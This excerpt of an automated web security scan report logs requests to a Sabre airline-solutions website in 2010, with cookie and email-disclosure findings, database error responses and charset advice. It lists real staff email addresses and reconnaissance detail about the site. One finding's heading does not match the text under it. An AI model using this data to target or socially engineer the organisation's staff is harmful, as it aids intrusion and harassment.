GET /images/prettyPhoto/dark_square/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321235; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A2%3Bs%3A49%3A%22%2Fnews_events%2Fevent%2Fsabresonic_global_conference2%2F%22%3Bi%3A3%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /images/prettyPhoto/light_rounded/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321231; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fsearch%2F%22%3Bi%3A1%3Bs%3A50%3A%22%2Fproducts_services%2Fproduct%2Fsabre_community_portal%2F%22%3Bi%3A2%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /images/uploads/flash/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321221; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3Bi%3A1%3Bs%3A27%3A%22%2Fproducts_services%2Fproduct%2F%22%3Bi%3A2%3Bs%3A49%3A%22%2Fnews_events%2Fevent%2Fsabresonic_global_conference2%2F%22%3Bi%3A3%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /images/uploads/releases/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323238; __utmb=178985382.2.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /js/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321208; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3Bi%3A1%3Bs%3A31%3A%22%2Fabout%2Fcopyright_and_trademark%2F%22%3Bi%3A2%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.
However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
The following email address was disclosed in the response:
web@sabre.com
Request
GET /home/about HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The following email address was disclosed in the response:
web@sabre.com
Request
GET /home/about/complete_the_picture/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The following email address was disclosed in the response:
web@sabre.com
Request
GET /home/about/copyright_and_trademark/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The following email addresses were disclosed in the response:
contact.us@sabre.com
event.marketing@sabre.com
info@sabreairlinesolutions.com
opportunities@sabre.com
sabre.investor.relations@sabre.com
web@sabre.com
Request
GET /home/about/privacy_policy/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The following email address was disclosed in the response:
web@sabre.com
Request
GET /home/about/sitemap/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The following email address was disclosed in the response:
web@sabre.com
Request
GET /home/ascend HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The following email address was disclosed in the response:
web@sabre.com
Request
GET /home/business_issues HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The following email addresses were disclosed in the response:
contact.americas@sabre.com
contact.apac@sabre.com
emea.contact@sabre.com
web@sabre.com
Request
GET /home/contact HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The following email address was disclosed in the response:
web@sabre.com
Request
GET /home/news_events HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The following email addresses were disclosed in the response:
danielle.timlin@sabre.com
web@sabre.com
Request
GET /home/news_events/event/operations_user_conference2 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The following email address was disclosed in the response:
web@sabre.com
Request
GET /home/products_services HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The following email address was disclosed in the response:
web@sabre.com
Request
GET /home/products_services/product/sabre_community_portal HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The following email address was disclosed in the response:
web@sabre.com
Request
GET /home/products_services/product/sabre_reaccommodation_manager/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The following email address was disclosed in the response:
web@sabre.com
Request
GET /home/search/show_results HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The following email address was disclosed in the response:
drew.diller@gmail.com
Request
GET /js/DD_belatedPNG.js HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Tue, 05 Oct 2010 16:12:30 GMT Server: Apache/2.2.3 (Red Hat) Last-Modified: Tue, 19 Jan 2010 21:29:53 GMT ETag: "e40681-1b6b-2ba4f640" Accept-Ranges: bytes Content-Length: 7019 Connection: close Content-Type: application/x-javascript
/** * DD_belatedPNG: Adds IE6 support: PNG images for CSS background-image and HTML <IMG/>. * Author: Drew Diller * Email: drew.diller@gmail.com * URL: http://www.dillerdesign.com/experiment/DD_belatedPNG/ * Version: 0.0.8a * Licensed under the MIT License: http://dillerdesign.com/experiment/DD_belatedPNG/#license * * Example usage: * DD_belat ...[SNIP]...
HTTP/1.1 200 OK Date: Tue, 05 Oct 2010 16:11:13 GMT Server: Apache/2.2.3 (Red Hat) Last-Modified: Tue, 12 Jan 2010 23:22:08 GMT ETag: "e40689-1096-ec314800" Accept-Ranges: bytes Content-Length: 4246 Connection: close Content-Type: application/x-javascript
/** * Cookie plugin * * Copyright (c) 2006 Klaus Hartl (stilbuero.de) * Dual licensed under the MIT and GPL licenses: * http://www.opensource.org/licenses/mit-license.php * http://www.gnu.org/li ...[SNIP]... kie will be set and the cookie transmission will * require a secure protocol (like HTTPS). * @type undefined * * @name $.cookie * @cat Plugins/Cookie * @author Klaus Hartl/klaus.hartl@stilbuero.de */
/** * Get the value of a cookie with the given name. * * @example $.cookie('the_cookie'); * @desc Get the value of a cookie. * * @param String name The name of the cookie. * @return The value of the cookie. * @type String * * @name $.cookie * @cat Plugins/Cookie * @author Klaus Hartl/klaus.hartl@stilbuero.de */ jQuery.cookie = function(name, value, options) { if (typeof value != 'undefined') { // name and value given, set cookie options = options || {}; if (value === null) {
...[SNIP]...
11. Credit card numbers disclosedpreviousnext There are 7 instances of this issue:
Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.
If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.
In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.
GET /home HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286320657; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Tue, 05 Oct 2010 18:33:42 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 00:43:25 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/about/complete_the_picture/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286320657; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 00:43:25 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/about/copyright_and_trademark/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286320657; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 00:43:25 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/about/executive_team/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286320657; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 00:43:25 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/about/executive_team/darren_rickey HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/executive_team/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321283; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fsearch%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3Bi%3A3%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Foperations_user_conference2%2F%22%3Bi%3A4%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:25:57 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/about/executive_team/ellen_ehrlich HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/executive_team/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321293; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fabout%2Fthe_as_advantage%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3Bi%3A3%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Foperations_user_conference2%2F%22%3Bi%3A4%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:28:41 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/about/executive_team/gordon_locke HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/executive_team/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321289; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A41%3A%22%2Fproducts_services%2Fenterprise_operations%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A7%3A%22%2Fabout%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:26:53 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/about/executive_team/ilia_kostov HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/executive_team/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321274; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3Bi%3A3%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Foperations_user_conference2%2F%22%3Bi%3A4%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:25:02 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/about/executive_team/mark_silagy HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/executive_team/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321271; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fnews_events%2Fevent%2Fsabresonic_global_conference2%2F%22%3Bi%3A4%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:23:40 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/about/executive_team/stephen_m._clampett HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/executive_team/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321284; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A7%3A%22%2Fabout%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 00:43:25 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/about/executive_team/tom_klein HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/executive_team/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321283; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Foperations_user_conference2%2F%22%3Bi%3A3%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 00:43:25 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/about/media_press/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286320657; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:28:41 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/about/privacy_policy/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286320657; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
Response
